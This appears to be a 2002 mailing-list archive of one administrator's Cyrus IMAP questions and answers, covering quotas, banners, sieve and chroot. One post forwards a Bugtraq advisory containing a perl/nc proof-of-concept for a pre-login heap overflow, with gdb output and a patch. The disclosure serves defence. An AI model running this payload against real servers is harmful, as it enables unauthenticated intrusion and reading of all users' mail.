pop login failure not logged to syslog
Hello,
I've got a few linux systems running cyrus imap 2.1.11 source compiles & a
few running Henrique de Moraes Holschuh's debian sid packages. I'm use
sasldb2 (cyrus sasl 2.1.9) for authentication.
I notice when my users supply the wrong password to imapd, messages are
written to syslog like;
"badlogin: localhost[127.0.0.1] plaintext steve SASL(-13): authentication
failure: checkpass failed"
When authentication fails with pop3d nothing is written to syslog & i'm
trying to work out why.
I'm no programmer but I had a look at cyrus-imapd-2.1.11/imap/pop3d.c
Here is what I found;
I noticed lines 1130-1113 read something like, if reply returns true, log
"badlogin" to syslog.
1130if (reply) {
1131syslog(LOG_NOTICE, "badlogin: %s plaintext %s %s",
1132 popd_clienthost, popd_userid, reply);
1133}
If I make this read;
1130if (!(reply)) {
1131syslog(LOG_NOTICE, "badlogin: %s plaintext %s %s",
1132 popd_clienthost, popd_userid, reply);
1133}
Pop login failures are now logged to syslog;
Dec 5 23:47:46 dustpuppy pop3d[4572]: badlogin: [127.0.0.1] plaintext
steve (null)
I'm guessing (null) means reply was empty / not true?
Why might I be getting this ?
What other information might I supply you to help trackdown my fault?
With Thanks,
Steve.
Fwd: pre-login buffer overflow in Cyrus IMAP server
Hello,
The message below is forwarded from bugtraq.
I've not seen any discussion of this, is an official fix available ?
The "semi-exploit" shown does indeed segfault imapd processes on my Debian
(sid) boxes.
Steve.
-- Forwarded Message --
Subject: pre-login buffer overflow in Cyrus IMAP server
Date: Mon, 2 Dec 2002 19:56:06 +0200
From: Timo Sirainen <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
problem
---
Cyrus IMAP server has a a remotely exploitable pre-login buffer overflow. I
checked versions 1.4 (oldest in web page) and 2.1.10 which both had it, so
apparently all versions are affected.
Problem is that literal lengths aren't verified to be in any reasonable
range. The length + 2 is then malloc()ed and later written into. So given
length of 2^32-1, we get malloc(1) call but ability to write 2^32-1 bytes
there.
Note that you don't have to log in before exploiting this, and since Cyrus
runs everything under one UID, it's possible to read every user's mail in
the system.
I verified that this is exploitable with GLIBC 2.3.1. Probably possible
with older glibcs as well although they had somewhat different malloc()
code. No idea about other libcs, BSD ones look safe. There could be of
course other ways to exploit it than just malloc headers.
(BTW. Why is it that glibc's malloc implementation is almost begging to be
exploited? I don't think it would be that difficult to create safer
implementation with internal structures in separate memory pages, possibly
even separated with non-writable page(s) between. Could even be faster
because of better CPU cache utilization, and maybe made to take less
memory.)
There's several other malloc/integer related problems where it's possible
to read over 2GB strings from clients into memory accessing it with signed
integers, finally wrapping into -2^31. That's probably not too bad since it
can work only with >2GB process limits (only 64bit architectures I'd think)
and even then it would quite likely access only unmapped memory.
Authors were first contacted 30. October, I think it's way past the fix
time.
semi-exploit
perl -e 'print "x login
{4294967295}\r\n\xf0\xef\xff\xbf\x90\xef\xff\xbf\xfc\xff\xff\xff\xfc\xff\xff
\xff";'|nc localhost imap2
The first 4 bytes specify the address where you want to write to in memory
and the next 4 bytes is the data to be written there (must be a readable
memory address). Rest of the bytes are overwriting prev_size and size in
malloc header. The above values work with cyrus21 package in Debian
unstable/x86. gdb verifies that the call was successful:
Program received signal SIGSEGV, Segmentation fault.
0xbfffef90 in ?? ()
(gdb) bt
#0 0xbfffef90 in ?? ()
#1 0x400233e9 in prop_dispose () from /usr/lib/libsasl2.so.2
#2 0x4002ae1a in sasl_setpass () from /usr/lib/libsasl2.so.2
#3 0x40026cd2 in sasl_dispose () from /usr/lib/libsasl2.so.2
Shouldn't be too hard to come up with a real exploit from there on.
You also need to make one "x logout\n" connection first to trigger the
exploit (Cyrus reuses the processes).
fix
---
Apply the included patch and set some reasonable ulimits to make sure the
other integer overflows won't hit you in future.
diff -ru cyrus-imapd-2.1.10-old/imap/imapparse.c
cyrus-imapd-2.1.10/imap/imapparse.c ---
cyrus-imapd-2.1.10-old/imap/imapparse.c2002-06-24 21:58:41.0 +0300
+++ cyrus-imapd-2.1.10/imap/imapparse.c2002-11-29 00:20:44.0 +0200
@@ -97,7 +97,7 @@
struct buf *buf, int type)
{
int c;
-int i;
+unsigned int i;
unsigned int len = 0;
int sawdigit = 0;
int isnowait;
@@ -228,6 +228,16 @@
if (c != EOF) prot_ungetc(c, pin);
return EOF;
}
+ if (len > 65536) {
+ if (isnowait) {
+ for (i = 0; i < len; i++)
+ c = prot_getc(pin);
+ }
+ prot_printf(pout, "* BAD Literal too large\r\n");
+ prot_flush(pout);
+ if (c != EOF) prot_ungetc(c, pin);
+ return EOF;
+ }
if (len >= buf->alloc) {
buf->alloc = len+1;
buf->s = xrealloc(buf->s, buf->alloc+1);
---
Re: removing banners from cyrus
Changing pop3d.c will only change the "+OK %s Cyrus POP3 v2.0.15 server
ready" banner.
If you want to change the imap banner, to the best of my knowledge you have
to change (in imapd.c) the "OK %s Cyrus IMAP4 %s server ready\r\n" line (same
as pop3d.c), the section containing the imap id (as per RFC2971)
prot_printf(imapd_out, "* ID ("
"\"name\" \"Cyrus\""
" \"version\" \"%s\""
" \"vendor\" \"Project Cyrus\""
" \"support-url\" \"http://asg.web.cmu.edu/cyrus\"";,
CYRUS_VERSION);
& there are a few entries specific to netscape.
Steve.
On Tuesday 02 April 2002 15:39, you wrote:
> This will take care of both the IMAP and POP3 banners? Nothing needs to be
> done to say .. imapd.c
>
> Thanks again
>
> At 11:01 AM 4/2/2002 +0100, Steve Wright wrote:
> >The "+OK %s Cyrus POP3 v2.0.15 server ready" banner can be changed by
> > editing line 323 in /src/cyrus-imapd-2.0.15/imap/pop3d.c
Re: removing banners from cyrus
The "+OK %s Cyrus POP3 v2.0.15 server ready" banner can be changed by editing line 323 in /src/cyrus-imapd-2.0.15/imap/pop3d.c On Tuesday 02 April 2002 10:06, you wrote: > > What is the procedure for removing the banners from Cyrus? I am sure > > this involves edition a source file and recompiling I hust haven't > > seen this documented anywhere. If someone could advise. Thanks > > Banners Cyrus ??? Cyrus doesnt have banners ? Does it ? > > Are you sure it is not your MTA which is probably where banners > should be removed anyway ?
Re: Postfix & cyrus
cyrdeliver does not exists.
The documentation was written for an earlier version of cyrus.
cyrus unix - n n - - pipe
flags=R user=cyrus argv=/usr/cyrus/bin/deliver -e -m ${extension} ${user}
is working fine on one of my servers.
Strangely the default master.cf that accompanies postfix 1.1.3 (latest
stable) is also incorrect. :(
Steve.
On Monday 04 March 2002 13:28, you wrote:
> I saw in a documentation ;-) how to use postfix to transport mail:
> insert in /etc/postfix/master.cf the following line:
> cyrus unix - n n - - pipe
> flags=R user=cyrus argv=/usr/sbin/cyrdeliver -e -m ${extension}
> ${user}
>
> But I can't locate cyrdeliver.
Re: howto change postfix / cyrus quota message
I am reading this now. These look excellent, this and rfc 1893 make these codes very clear and easy to understand. You have my thanks :) Steve. On Friday 22 February 2002 14:38, you wrote: >From: Steve Wright <[EMAIL PROTECTED]> >Date: Thu, 21 Feb 2002 16:51:12 + >Cc: <[EMAIL PROTECTED]> > >Lawrence, > >This was working as 4.2.2 I have changed it to 5.2.2 & it is still > working. What difference should I expect to see or problems might I > experience with this as 4.2.2 >I am not familiar with what these codes represent, I would be grateful > if you will point to documentation for them (eg rfc, website, etc). > > It's unlikely that 4.2.2 will break anything, but it's not following > the standards. See RFC 2034. > > Larry
webmail
Can someone recommend me a good webmail package ? At somepoint in the near future I will need to setup webmail on our production servers & after seeing the security squirrelmail offers I think it will be very hard to make a case for it. I know of imp, mulberry & silkymail but have not used any of these packages. What I would really like is people who have webmail running to tell me what they feel the pros & cons are with the packages they are using. With Thanks, Steve.
Re: howto change postfix / cyrus quota message
Lawrence, This was working as 4.2.2 I have changed it to 5.2.2 & it is still working. What difference should I expect to see or problems might I experience with this as 4.2.2 I am not familiar with what these codes represent, I would be grateful if you will point to documentation for them (eg rfc, website, etc). With Thanks Steve. On Thursday 21 February 2002 16:30, you wrote: > From: Steve Wright <[EMAIL PROTECTED]> >Date: Thu, 21 Feb 2002 12:57:44 + >Cc: <[EMAIL PROTECTED]> > >How I changed the quota message; > >To change the message cyrus rejects over quota mail with I modified >/usr/local/src/cyrus-imapd-2.0.16/imap/lmtpengine.c (line 152) > >The lines 151 & 152 now read; >151case IMAP_QUOTA_EXCEEDED: >152return "550 4.2.2 Over quota"; > > You need to make that > > return "550 5.2.2 Over quota"; > > Larry
quota message
I'm getting this message generated by postfix when cyrus refuses to accept mail because the cyrus user is over quota, I need to remove the reference to the lmtp socket, can anyone tell me how ?? This is the Postfix program at host mail.domain.co.uk I'm sorry to have to inform you that the message returned below could not be delivered to one or more destinations. For further assistance, please send mail to If you do so, please include this problem report. You can delete your own text from the message returned below. The Postfix program <[EMAIL PROTECTED]>: host /var/spool/postfix/public/lmtp[/var/spool/postfix/public/lmtp] said: 550 4.2.2 Over quota Thanks, Steve.
Re: duplicate_prune - what does this mean
You would have a problem if it wasn't there :) Steve On Thursday 21 February 2002 14:16, you wrote: > So it's absolutely ok! Isn't it? > > Manuel
Re: duplicate_prune - what does this mean
Cyrus keeps a database to prevent duplicate emails. The ctl_deliver command removes old entries that are no longer needed from this database. I believe the command is run about every 20 minutes and will delete any entries in the database over 3 days old. Steve. On Thursday 21 February 2002 13:34, you wrote: > When ever I start the cyrus-imapd I got the following two lines for > every letter from a-z in my logfile: > > Feb 21 14:09:03 he0 ctl_deliver[36825]: creating > /usr/local/etc/imap/deliverdb/deliver-z.db > Feb 21 14:09:03 he0 ctl_deliver[36825]: duplicate_prune: > /usr/local/etc/imap/deliverdb/deliver-z.db: purged 0 out of 0 entries > > Can anyone tell me what this means? > > Thanks, > Manuel
Re: howto change postfix / cyrus quota message
Andrei, Not sure if I understand your question, the behavior will change but only because we change the response code cyrus gives. My understanding of this is below (and please tell me if i'm wrong), how I understand this over quota mail is never placed in the queue by cyrus. It is only placed in the queue by postfix. But if I have understood you correctly you want to know only that mail will bounce immediately & the answer is yes. My understanding = Incoming mail --> Postfix --> Cyrus --> Outgoing Incoming mail being smtp Outgoing mail being a client using pop3 / imap / etc In a 'normal' compile of cyrus, mail comes into postfix which accepts the mail because the recipient is in whatever list of valid users it uses, the mail is now in postfix's spool. Postfix now attempts to deliver the mail to its destination which for local mail will be cyrus, it does this either via deliver or lmtp. Cyrus checks if the user is valid, then if it checks the quota, if the user is over quota it responds with a temporary error code & an english message saying "over quota". The message is still in postfix's spool & can be seen with mailq, Postfix will attempt to deliver the mail for the next 5 days (default), it will also continue to accept mail for the user. This patch modifies the error code cyrus returns to postfix, causing postfix not to continue attempting to deliver mail, but to bounce the mail as undeliverable back to the sender (including the "over quota" text cyrus passed it). Steve. On Thursday 21 February 2002 13:05, you wrote: > > The lines 151 & 152 now read; > > 151 case IMAP_QUOTA_EXCEEDED: > > 152return "550 4.2.2 Over quota"; > > It will change the message, but will it change cyrus' behavior also? > I mean not to place overquoted message to the queue, an reject it > immediately ? > > > Andrei V. Loukinykh , Evpatoria Ukrtelecom ISP, +380 6569 29376 > ~~~ > "UNIX is like a vigvam - no Windows, no Gates and an Apache inside"
Re: howto change postfix / cyrus quota message
How I changed the quota message; To change the message cyrus rejects over quota mail with I modified /usr/local/src/cyrus-imapd-2.0.16/imap/lmtpengine.c (line 152) The lines 151 & 152 now read; 151 case IMAP_QUOTA_EXCEEDED: 152return "550 4.2.2 Over quota"; After recompiling cyrus the only binary files that will have changed are deliver & lmtpd, these files are located as; /usr/local/src/cyrus-imapd-2.0.16/imap/deliver /usr/local/src/cyrus-imapd-2.0.16/imap/lmtpd Backup /usr/cyrus/bin/deliver & /usr/cyrus/bin/lmtpd Stop cyrus & replace the two files with the new copies. Restart cyrus & the message will have changed. I hope this helps. Steve. On Thursday 21 February 2002 12:45, you wrote: > Hello > > > I have therefor (from information I found in the mailing list archives) > > altered cyrus to no longer issue a temporary error, cyrus will now issue > > 550 when the user is over quota. > > Please, could u tell me how to do that, or direct me to that message , > where u found the answer . I couldnt find it in the mailing list. > > Thanks > Regards > > > Andrei V. Loukinykh , Evpatoria Ukrtelecom ISP, +380 6569 29376 > ~~~ > "UNIX is like a vigvam - no Windows, no Gates and an Apache inside"
postfix / cyrus quota message
First, Thank you to everyone who emailed me with large companies / organizations that are running cyrus. Next, I have hit a snag & am not sure if this is caused be some configuration option I have not correctly set. I have postfix delivering to cyrus via lmtp, this works great. When a user becomes over quota (set via cyradm), cyrus will not accept mail for that user & a temporary error will be issued to postfix, postfix will then keep mail in its spool until it can be delivered. This is not desired, I want mail for users over quota to be rejected! I have therefor (from information I found in the mailing list archives) altered cyrus to no longer issue a temporary error, cyrus will now issue 550 when the user is over quota. This works and is good, however the bounce message returned to the message sender is; postfix etc,etc When talking to lmtp:/pathtosocket/socketname the etc,etc said "User over quota" etc,etc This is my problem, I have no desire for people to know the location of the lmtp socket nor see any information about it. Is there a way to stop this ?? I would like the message sender to get a message something like; postfix etc,etc The message could not be delivered as the mailbox is full, please try later. Is there possibly another code instead of 550 I should not accept mail with ?? With Thanks Steve.
who uses cyrus ?
Hi, We are evaluating cyrus imap & sieve for our production servers & I would be grateful if someone could name maybe a few large companies / organizations that are also running it. Thanks Steve.
Problem with sieve
Hi
I am running cyrus & have had for quite sometime with no problems.
I would now like to use sieve with websieve as a gui.
I have installed websieve but can not login.
Websieve returns;
System Error: IMAP::Sieve [ Login incorrect while connecting to localhost ]:
NO ("SASL" "no mechanism available") "Authentication error"
I have rtfm & searched google however the only relevant information I can
find is from the cyrus docs (that come with cyrus) telling me if I telnet to
the sieve port I should be greeted with;
Connected to cyrus-dev.andrew.cmu.edu.
Escape character is '^]'.
"CMU Experimental Sieved version 0.99" "SASL={GSSAPI, ANONYMOUS, PLAIN,
KERBEROS_V4}"
This is not happening I am greeted with;
Connected to localhost.
Escape character is '^]'.
"IMPLEMENTATION" "Cyrus timsieved v1.0.0"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress regex"
OK
Providing no SASL information ??
Is this correct ???
Is there anyway I can login / authenticate to sieve via telnet to prove if
the problem is with cyrus or something I have not done with websieve ??
With Thanks,
Steve.
Re: create users without cryadm
Doesn't matter, I've just seen how to do this using the perl modules. Steve On Thursday 14 February 2002 13:39, you wrote: > Hi > > I've just setup cyrus on another server & I need to create users from the > command line (ie without using cyradm), can anyone tell me how I can do > this (or point me to a webpage). > > Thanks > Steve.
create users without cryadm
Hi I've just setup cyrus on another server & I need to create users from the command line (ie without using cyradm), can anyone tell me how I can do this (or point me to a webpage). Thanks Steve.
sasldb realm change ?
I've just changed the servername for cyrus imap, I note doing this changes the realm cyrus checks in sasldb.. Is there a way to change the realm a user in the sasldb belongs to (without reseting the users password) ?? Thanks, Steve
problem compiling sasl with pam
Hi, I'm setting up cyrus authenticate to an ldap database, I know from reading the docs to compile sasl to use pam. Unfortunately I can see ./configure checking for pam_start & pam support then returning no on both ... What files is configure checking for ? (pam is installed) & where are they usually located ? I'm running Debain 2.2rc3 Compiling cyrus-sasl-1.5.24 Thanks. -- Steve Wright Systems Administrator ICQ: 123189056
Re: chroot cyrus
Cyrus will be installed (eventully) on our isp mail server. The current setup is such that apache & bind run chroot, therefor if compromised the attacker will only be allowed access to their separate directory structures. (eg bind compromised, /chroot/dns/ appears to be root, only subdirectorys thereof are at risk) Upon installation I wish the same to be true of Cyrus. The facilitys I require from Cyrus are pop3, imap & imap via ssl. Web based mail will be installed when the new system is operational, to deviate slightly has anyone had experience of SquirrelMail (www.squirrelmail.org), it appears to have a cleaner interface than imp & I will need to evalutate both products. I hope you may be able to provide me with help. Steve Wright Systems Administrator Seva Adari wrote: >Without knowing the reasons for why your are trying to chroot >cyrus, it is difficult to comment. I am not quite sure if chrooting >is relevant or is necessary at all for cyrus-imap! > >>From a security point of view cyrus is well designed to stay in >private ip space and serve the users. What you may want to do >is to allow interaction to cyrus via web interface, using for example >imp from www.horde.org or similar other applications. >__ >Seva > >Steve Wright wrote: > >>This is probably not a very good question, but i'm new to cyrus. >> >>I want to setup cyrus running in a chroot enviroment, am I correct in >>thinking all I need to do is move the binarys, librarys & config files >>inside a directory structure then "chroot /[dir.structure] master &" ? >>Or like postfix is there an option to run its child process(s) chroot ? >> >>Thanks >>Steve Wright >> > > >
chroot cyrus
This is probably not a very good question, but i'm new to cyrus. I want to setup cyrus running in a chroot enviroment, am I correct in thinking all I need to do is move the binarys, librarys & config files inside a directory structure then "chroot /[dir.structure] master &" ? Or like postfix is there an option to run its child process(s) chroot ? Thanks Steve Wright
